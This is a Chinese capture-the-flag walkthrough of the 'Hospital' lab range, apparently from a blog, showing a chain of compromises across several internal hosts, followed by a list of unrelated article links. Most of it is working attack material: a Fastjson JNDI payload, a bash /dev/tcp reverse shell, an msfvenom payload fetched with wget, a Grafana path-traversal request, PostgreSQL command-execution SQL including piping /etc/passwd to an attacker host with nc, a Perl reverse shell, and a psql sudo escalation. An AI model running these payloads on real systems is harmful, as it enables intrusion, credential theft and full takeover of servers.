当前位置: 首页 > news >正文

春秋云镜 Hospital

入口机 172.30.12.5

heapdump泄露Shirokey,然后注入内存马

GAYysgMQhG7/CzIJlVpR2g==

稳固shell

python3 -c 'import pty; pty.spawn("/bin/bash")'
stty raw -echo;fg
xterm

suid提权

vim直接读文件

建立隧道

./proxy socks -t tcp -p "0.0.0.0:6666" --daemon

添加路由

run post/multi/manage/autoroute

172.30.12.6

nacos漏洞

[2025-08-19 08:49:33] [INFO] 暴力破解线程数: 1[2025-08-19 08:49:33] [INFO] 开始信息扫描[2025-08-19 08:49:33] [INFO] 最终有效主机数量: 1[2025-08-19 08:49:33] [INFO] 开始主机扫描[2025-08-19 08:49:34] [INFO] 有效端口数量: 233[2025-08-19 08:49:34] [SUCCESS] 端口开放 172.30.12.6:445[2025-08-19 08:49:34] [SUCCESS] 端口开放 172.30.12.6:139[2025-08-19 08:49:34] [SUCCESS] 端口开放 172.30.12.6:135[2025-08-19 08:49:35] [SUCCESS] 端口开放 172.30.12.6:8848[2025-08-19 08:49:39] [SUCCESS] 服务识别 172.30.12.6:445 => [2025-08-19 08:49:39] [SUCCESS] 服务识别 172.30.12.6:139 =>  Banner:[.][2025-08-19 08:49:45] [SUCCESS] 服务识别 172.30.12.6:8848 => [http]​[2025-08-19 08:50:39] [SUCCESS] 服务识别 172.30.12.6:135 => [2025-08-19 08:50:39] [INFO] 存活端口数量: 4[2025-08-19 08:50:39] [INFO] 开始漏洞扫描[2025-08-19 08:50:39] [INFO] 加载的插件: findnet, ms17010, netbios, smb, smb2, smbghost, webpoc, webtitle[2025-08-19 08:50:39] [SUCCESS] NetBios 172.30.12.6     WORKGROUP\SERVER02            [2025-08-19 08:50:39] [SUCCESS] NetInfo 扫描结果目标主机: 172.30.12.6主机名: Server02发现的网络接口:IPv4地址:└─ 172.30.12.6[2025-08-19 08:50:39] [SUCCESS] 网站标题 http://172.30.12.6:8848   状态码:404 长度:431    标题:HTTP Status 404 – Not Found[2025-08-19 08:50:40] [SUCCESS] 目标: http://172.30.12.6:8848漏洞类型: poc-yaml-alibaba-nacos漏洞名称: 详细信息:author:AgeloVitolinks:https://blog.csdn.net/caiqiiqi/article/details/112005424[2025-08-19 08:50:40] [SUCCESS] 目标: http://172.30.12.6:8848漏洞类型: poc-yaml-alibaba-nacos-v1-auth-bypass漏洞名称: 详细信息:author:kmahyyg(https://github.com/kmahyyg)links:https://github.com/alibaba/nacos/issues/4593进入是Administrator权限

172.30.12.236

扫描目录发现有登录,根据提示,有fastjson,尝试

POST /login HTTP/1.1Host: 172.30.12.236:8080Origin: http://172.30.12.236:8080sec-ch-ua-platform: "Android"Accept-Language: zh-CN,zh;q=0.9sec-ch-ua-mobile: ?1Cookie: JSESSIONID=33DD11B0271A4D01134EB5F92EE107B7Referer: http://172.30.12.236:8080/loginCache-Control: max-age=0User-Agent: Mozilla/5.0 (Linux; Android 11; Pixel C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.181 Safari/537.36sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="88", "Google Chrome";v="88"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateContent-Type: application/jsonUpgrade-Insecure-Requests: 1Content-Length: 22​{"@type": "java.lang.AutoCloseable"

发现存在1.2.45的fastjson

进行漏洞利用

java -cp jndi_tool.jar jndi.EvilRMIServer 1099 8888 "bash -i >& /dev/tcp/172.30.12.5/9008 0>&1"
POST /login HTTP/1.1Host: 172.30.12.236:8080Origin: http://172.30.12.236:8080sec-ch-ua-platform: "Android"Accept-Language: zh-CN,zh;q=0.9sec-ch-ua-mobile: ?1Cookie: JSESSIONID=33DD11B0271A4D01134EB5F92EE107B7Referer: http://172.30.12.236:8080/loginCache-Control: max-age=0User-Agent: Mozilla/5.0 (Linux; Android 11; Pixel C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.181 Safari/537.36sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="88", "Google Chrome";v="88"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateContent-Type: application/jsonUpgrade-Insecure-Requests: 1Content-Length: 22​{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://172.30.12.5:1099/Object","autoCommit":true}}

成功获得root权限

稳固shell

python3 -c 'import pty; pty.spawn("/bin/bash")'stty raw -echo;fgxterm

发现另个网段

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500inet 172.30.12.236  netmask 255.255.0.0  broadcast 172.30.255.255inet6 fe80::216:3eff:fe12:ac91  prefixlen 64  scopeid 0x20<link>ether 00:16:3e:12:ac:91  txqueuelen 1000  (Ethernet)RX packets 175628  bytes 201792350 (201.7 MB)RX errors 0  dropped 0  overruns 0  frame 0TX packets 49468  bytes 25098873 (25.0 MB)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0​eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500inet 172.30.54.179  netmask 255.255.255.0  broadcast 172.30.54.255inet6 fe80::216:3eff:fe12:ac1e  prefixlen 64  scopeid 0x20<link>ether 00:16:3e:12:ac:1e  txqueuelen 1000  (Ethernet)RX packets 1019  bytes 42798 (42.7 KB)RX errors 0  dropped 0  overruns 0  frame 0TX packets 1037  bytes 44194 (44.1 KB)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

建立代理

./proxy socks -t tcp -p "0.0.0.0:6666" --daemon

上线

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=172.30.12.5 LPORT=4545 -f elf > shell.elfwget http://172.30.12.5:8082/shellchmod +x shell./shell &

添加路由

run post/multi/manage/autoroute

信息收集

[2025-08-19 10:14:21] [INFO] 暴力破解线程数: 1[2025-08-19 10:14:21] [INFO] 开始信息扫描[2025-08-19 10:14:21] [INFO] 最终有效主机数量: 1[2025-08-19 10:14:21] [INFO] 开始主机扫描[2025-08-19 10:14:21] [INFO] 有效端口数量: 233[2025-08-19 10:14:21] [SUCCESS] 端口开放 172.30.54.12:22[2025-08-19 10:14:21] [SUCCESS] 端口开放 172.30.54.12:3000[2025-08-19 10:14:21] [SUCCESS] 端口开放 172.30.54.12:5432[2025-08-19 10:14:21] [SUCCESS] 服务识别 172.30.54.12:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.][2025-08-19 10:14:26] [SUCCESS] 服务识别 172.30.54.12:3000 => [http] Banner:[HTTP/1.1 400 Bad Request.Content-Type: text/plain; charset=utf-8.Connection: close.400 Bad Request][2025-08-19 10:14:27] [SUCCESS] 服务识别 172.30.54.12:5432 => [2025-08-19 10:14:27] [INFO] 存活端口数量: 3[2025-08-19 10:14:27] [INFO] 开始漏洞扫描[2025-08-19 10:14:27] [INFO] 加载的插件: postgres, ssh, webpoc, webtitle[2025-08-19 10:14:27] [SUCCESS] 网站标题 http://172.30.54.12:3000  状态码:302 长度:29     标题:无标题 重定向地址: http://172.30.54.12:3000/login[2025-08-19 10:14:27] [SUCCESS] 网站标题 http://172.30.54.12:3000/login 状态码:200 长度:27909  标题:Grafana[2025-08-19 10:20:27] [SUCCESS] 扫描已完成: 4/4

172.30.54.12

GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1Host: 172.30.54.12:3000Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36​

存在任意文件读取漏洞,直接用工具拿到PostgreSQL账密

windows_amd64_grafanaExp

postgres:Postgres@123

命令执行

CVE-2019–9193DROP TABLE IF EXISTS cmd_exec;          -- [Optional] Drop the table you want to use if it already existsCREATE TABLE cmd_exec(cmd_output text); -- Create the table you want to hold the command outputCOPY cmd_exec FROM PROGRAM 'id';        -- Run the system command via the COPY FROM PROGRAM functionSELECT * FROM cmd_exec;                 -- [Optional] View the resultsDROP TABLE IF EXISTS cmd_exec;          -- [Optional] Remove the table使用 libc.so.6CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');

反弹shell

select system('perl -e \'use Socket;$i="172.30.54.179";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');

稳固shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

psql提权

$ sudo -lMatching Defaults entries for postgres on web04:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin​User postgres may run the following commands on web04:(ALL) NOPASSWD: /usr/local/postgresql/bin/psql

修改root密码

ALTER USER root WITH PASSWORD '123456';
root=# \?!/bin/bash#需要输入的就是\? 和!/bin/bash

http://www.dtcms.com/a/348575.html

相关文章:

  • Vue 3多语言应用开发实战:vue-i18n深度解析与最佳实践
  • 线程包括哪些状态?线程状态之间是如何变化的?
  • yggjs_rlayout框架v0.1.2使用教程 02 TechLayout 布局组件
  • 拿AI下围棋 -- 开源项目leela-zero
  • ​Mac用户安装JDK 22完整流程(Intel版dmg文件安装指南附安装包下载)​
  • mysql历史社区版本下载
  • 面试题及解答:掌握Linux下常用性能分析工具
  • (Redis)过期删除策略
  • 半年网络安全转型学习计划表(每天3小时)
  • Highcharts推出OEM许可证中国区正式上线:赋能企业级嵌入式数据可视化解决方案
  • 如何使用 DeepSeek 助力工作​。​
  • 数据可视化——matplotlib库
  • EPWpy教程:一个脚本完成能带、声子、电声耦合、弛豫时间计算
  • [自用笔记]上传本地项目至github
  • 联想win11笔记本音频失效,显示差号(x)
  • 【嵌入式DIY实例-ESP32篇】-物联网电能表
  • 硬件开发_基于物联网的宠物猫饲养系统
  • 中介者模式与几个C++应用实例
  • 【高等数学】第十章 重积分——第二节 二重积分的计算法
  • 交通拥堵识别准确率↑22.5%!陌讯多模态时序融合算法在智慧交通的落地优化
  • Spring AOP面向切面的底层原理、注解、切入点表达式、连接点获取方法名参数值等
  • C++STL底层原理:探秘标准模板库的内部机制
  • 从全栈开发到微服务架构:一次真实的Java面试实录
  • 【机器学习】9 Generalized linear models and the exponential family
  • 大模型面试题剖析:微调与 RAG 技术的选用逻辑
  • 【Docker项目实战】使用Docker部署Hibiscus.txt简单日记工具
  • VITE BALABALA require balabla not supported
  • Linux:shell命令
  • 【数据结构】-4-顺序表(上)
  • AI Agent与生成式AI双驱动:AI如何重塑商业格局并创造千亿级增量价值